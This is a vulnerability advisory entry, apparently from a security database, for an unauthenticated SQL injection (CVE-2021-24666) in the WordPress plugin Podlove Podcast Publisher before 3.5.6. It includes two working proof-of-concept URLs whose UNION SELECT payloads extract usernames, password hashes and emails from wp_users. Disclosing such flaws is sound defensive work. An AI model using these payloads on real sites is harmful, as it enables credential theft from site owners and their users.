Lucene search
Dc11WPEX-ID:FB4D7988-60FF-4862-96A1-80B1866336FEHistoryAug 24, 2021 - 12:00 a.m.
Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection
2021-08-2400:00:00
dc11
331
0.289 Low
EPSS
Percentile
96.9%
The plugin contains a ‘Social & Donations’ module (not activated by default), which adds the rest route '/services/contributor/(?P[\d]+), takes an ‘id’ and ‘category’ parameters as arguments. Both parameters can be used for the SQLi.
With the 'Social & Donations' module of the plugin activated.
Permalink Setting: Plain
PoC with payload in id param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23
PoC with payload in category param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&category=1')+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23Related
patchstack
patchstack
cvelist
cvelist
prion
prion
Default credentials
2021-09-27 16:15:00
osv
osv
CVE-2021-24666
2021-09-27 16:15:09
nvd
nvd
CVE-2021-24666
2021-09-27 16:15:09
nuclei
nuclei
WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection
2023-03-31 11:28:24
wpvulndb
wpvulndb
Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection
2021-08-24 00:00:00
cve
cve
CVE-2021-24666
2021-09-27 16:15:09